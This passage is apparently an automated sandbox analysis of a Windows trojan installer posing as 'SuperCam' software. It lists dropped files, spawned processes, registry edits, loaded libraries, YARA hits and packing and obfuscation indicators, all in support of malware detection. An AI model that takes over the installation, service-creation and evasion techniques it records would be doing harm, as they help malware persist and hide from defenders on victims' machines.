                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_02D7ACFA5_2_02D7ACFA
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_02D7DD595_2_02D7DD59
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_02D785035_2_02D78503
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_02D9BF805_2_02D9BF80
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_02D9BF315_2_02D9BF31
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_02D9B4E55_2_02D9B4E5
                    Source: Joe Sandbox ViewDropped File: C:\ProgramData\EShineEncoder\sqlite3.dll 16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: String function: 0040595C appears 116 times
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: String function: 00403400 appears 61 times
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: String function: 00406AB4 appears 41 times
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: String function: 00445DCC appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: String function: 004344D4 appears 32 times
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: String function: 0044609C appears 59 times
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: String function: 00408BFC appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: String function: 00457D3C appears 73 times
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: String function: 00403494 appears 82 times
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: String function: 004078E4 appears 42 times
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: String function: 00453318 appears 93 times
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: String function: 00457B30 appears 94 times
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: String function: 00403684 appears 221 times
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: String function: 02D78BA0 appears 37 times
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: String function: 02D853F0 appears 139 times
                    Source: vc8Kx5C54G.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: vc8Kx5C54G.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: vc8Kx5C54G.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: vc8Kx5C54G.tmp.0.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: is-MF7B1.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: is-MF7B1.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: is-MF7B1.tmp.1.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: sqlite3.dll.5.drStatic PE information: Number of sections : 19 > 10
                    Source: is-1NCOM.tmp.1.drStatic PE information: Number of sections : 19 > 10
                    Source: vc8Kx5C54G.exe, 00000000.00000003.1674056082.0000000002320000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs vc8Kx5C54G.exe
                    Source: vc8Kx5C54G.exe, 00000000.00000003.1674199169.00000000020F8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs vc8Kx5C54G.exe
                    Source: vc8Kx5C54G.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@10/31@1/1
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_02D708C0 FormatMessageA,GetLastError,FormatMessageA,GetLastError,5_2_02D708C0
                    Source: C:\Users\user\Desktop\vc8Kx5C54G.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_004555B8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_004555B8
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_00455DE0 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,1_2_00455DE0
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: CreateServiceA,CloseServiceHandle,CloseServiceHandle,5_2_00402B32
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_0046DF04 GetVersion,CoCreateInstance,1_2_0046DF04
                    Source: C:\Users\user\Desktop\vc8Kx5C54G.exeCode function: 0_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource,0_2_00409BEC
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpFile created: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33Jump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7016:120:WilError_03
                    Source: C:\Users\user\Desktop\vc8Kx5C54G.exeFile created: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmpJump to behavior
                    Source: Yara matchFile source: 5.0.supercam360.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000000.1687909842.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2920111752.00000000058C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\is-9AUOP.tmp, type: DROPPED
                    Source: Yara matchFile source: C:\ProgramData\EShineEncoder\EShineEncoder.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe, type: DROPPED
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpFile read: C:\Windows\win.iniJump to behavior
                    Source: C:\Users\user\Desktop\vc8Kx5C54G.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: supercam360.exe, supercam360.exe, 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmp, supercam360.exe, 00000005.00000003.1692502005.0000000000A0B000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.5.dr, is-1NCOM.tmp.1.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: supercam360.exe, 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmp, supercam360.exe, 00000005.00000003.1692502005.0000000000A0B000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.5.dr, is-1NCOM.tmp.1.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: supercam360.exe, supercam360.exe, 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmp, supercam360.exe, 00000005.00000003.1692502005.0000000000A0B000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.5.dr, is-1NCOM.tmp.1.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                    Source: supercam360.exe, 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmp, supercam360.exe, 00000005.00000003.1692502005.0000000000A0B000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.5.dr, is-1NCOM.tmp.1.drBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                    Source: supercam360.exe, 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmp, supercam360.exe, 00000005.00000003.1692502005.0000000000A0B000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.5.dr, is-1NCOM.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: supercam360.exe, 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmp, supercam360.exe, 00000005.00000003.1692502005.0000000000A0B000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.5.dr, is-1NCOM.tmp.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: supercam360.exe, 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmp, supercam360.exe, 00000005.00000003.1692502005.0000000000A0B000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.5.dr, is-1NCOM.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: supercam360.exe, 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmp, supercam360.exe, 00000005.00000003.1692502005.0000000000A0B000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.5.dr, is-1NCOM.tmp.1.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: supercam360.exe, 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmp, supercam360.exe, 00000005.00000003.1692502005.0000000000A0B000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.5.dr, is-1NCOM.tmp.1.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: supercam360.exe, 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmp, supercam360.exe, 00000005.00000003.1692502005.0000000000A0B000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.5.dr, is-1NCOM.tmp.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: supercam360.exe, 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmp, supercam360.exe, 00000005.00000003.1692502005.0000000000A0B000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.5.dr, is-1NCOM.tmp.1.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: supercam360.exe, supercam360.exe, 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmp, supercam360.exe, 00000005.00000003.1692502005.0000000000A0B000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.5.dr, is-1NCOM.tmp.1.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: vc8Kx5C54G.exeReversingLabs: Detection: 52%
                    Source: vc8Kx5C54G.exeVirustotal: Detection: 50%
                    Source: C:\Users\user\Desktop\vc8Kx5C54G.exeFile read: C:\Users\user\Desktop\vc8Kx5C54G.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\vc8Kx5C54G.exe "C:\Users\user\Desktop\vc8Kx5C54G.exe"
                    Source: C:\Users\user\Desktop\vc8Kx5C54G.exeProcess created: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmp "C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmp" /SL5="$10414,3527699,54272,C:\Users\user\Desktop\vc8Kx5C54G.exe"
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" pause super_cam_11234
                    Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 pause super_cam_11234
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpProcess created: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe "C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe" -i
                    Source: C:\Users\user\Desktop\vc8Kx5C54G.exeProcess created: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmp "C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmp" /SL5="$10414,3527699,54272,C:\Users\user\Desktop\vc8Kx5C54G.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" pause super_cam_11234Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpProcess created: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe "C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe" -iJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 pause super_cam_11234Jump to behavior
                    Source: C:\Users\user\Desktop\vc8Kx5C54G.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\vc8Kx5C54G.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpSection loaded: msacm32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpSection loaded: riched20.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpSection loaded: usp10.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpSection loaded: msls31.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpSection loaded: sfc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeSection loaded: sqlite3.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpWindow found: window name: TMainFormJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SuperCam_is1Jump to behavior
                    Source: vc8Kx5C54G.exeStatic file information: File size 3775914 > 1048576
                    Source: Binary string: msvcp71.pdbx# source: is-C77TD.tmp.1.dr
                    Source: Binary string: msvcr71.pdb< source: is-MQ3QG.tmp.1.dr
                    Source: Binary string: msvcp71.pdb source: is-C77TD.tmp.1.dr
                    Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-F7KI7.tmp.1.dr
                    Source: Binary string: msvcr71.pdb source: is-MQ3QG.tmp.1.dr

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeUnpacked PE file: 5.2.supercam360.exe.400000.0.unpack .rsti3:ER;.rstj3:R;.rstk3:W;.rsrc:R;.rstl3:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeUnpacked PE file: 5.2.supercam360.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_00450294 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00450294
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .rsti3
                    Source: supercam360.exe.1.drStatic PE information: section name: .rsti3
                    Source: supercam360.exe.1.drStatic PE information: section name: .rstj3
                    Source: supercam360.exe.1.drStatic PE information: section name: .rstk3
                    Source: supercam360.exe.1.drStatic PE information: section name: .rstl3
                    Source: is-1NCOM.tmp.1.drStatic PE information: section name: /4
                    Source: is-1NCOM.tmp.1.drStatic PE information: section name: /19
                    Source: is-1NCOM.tmp.1.drStatic PE information: section name: /35
                    Source: is-1NCOM.tmp.1.drStatic PE information: section name: /51
                    Source: is-1NCOM.tmp.1.drStatic PE information: section name: /63
                    Source: is-1NCOM.tmp.1.drStatic PE information: section name: /77
                    Source: is-1NCOM.tmp.1.drStatic PE information: section name: /89
                    Source: is-1NCOM.tmp.1.drStatic PE information: section name: /102
                    Source: is-1NCOM.tmp.1.drStatic PE information: section name: /113
                    Source: is-1NCOM.tmp.1.drStatic PE information: section name: /124
                    Source: is-F7KI7.tmp.1.drStatic PE information: section name: Shared
                    Source: EShineEncoder.exe.5.drStatic PE information: section name: .rsti3
                    Source: EShineEncoder.exe.5.drStatic PE information: section name: .rstj3
                    Source: EShineEncoder.exe.5.drStatic PE information: section name: .rstk3
                    Source: EShineEncoder.exe.5.drStatic PE information: section name: .rstl3
                    Source: sqlite3.dll.5.drStatic PE information: section name: /4
                    Source: sqlite3.dll.5.drStatic PE information: section name: /19
                    Source: sqlite3.dll.5.drStatic PE information: section name: /35
                    Source: sqlite3.dll.5.drStatic PE information: section name: /51
                    Source: sqlite3.dll.5.drStatic PE information: section name: /63
                    Source: sqlite3.dll.5.drStatic PE information: section name: /77
                    Source: sqlite3.dll.5.drStatic PE information: section name: /89
                    Source: sqlite3.dll.5.drStatic PE information: section name: /102
                    Source: sqlite3.dll.5.drStatic PE information: section name: /113
                    Source: sqlite3.dll.5.drStatic PE information: section name: /124
                    Source: C:\Users\user\Desktop\vc8Kx5C54G.exeCode function: 0_2_004065B8 push 004065F5h; ret 0_2_004065ED
                    Source: C:\Users\user\Desktop\vc8Kx5C54G.exeCode function: 0_2_004040B5 push eax; ret 0_2_004040F1
                    Source: C:\Users\user\Desktop\vc8Kx5C54G.exeCode function: 0_2_00408104 push ecx; mov dword ptr [esp], eax0_2_00408109
                    Source: C:\Users\user\Desktop\vc8Kx5C54G.exeCode function: 0_2_00404185 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\vc8Kx5C54G.exeCode function: 0_2_00404206 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\vc8Kx5C54G.exeCode function: 0_2_0040C218 push eax; ret 0_2_0040C219
                    Source: C:\Users\user\Desktop\vc8Kx5C54G.exeCode function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
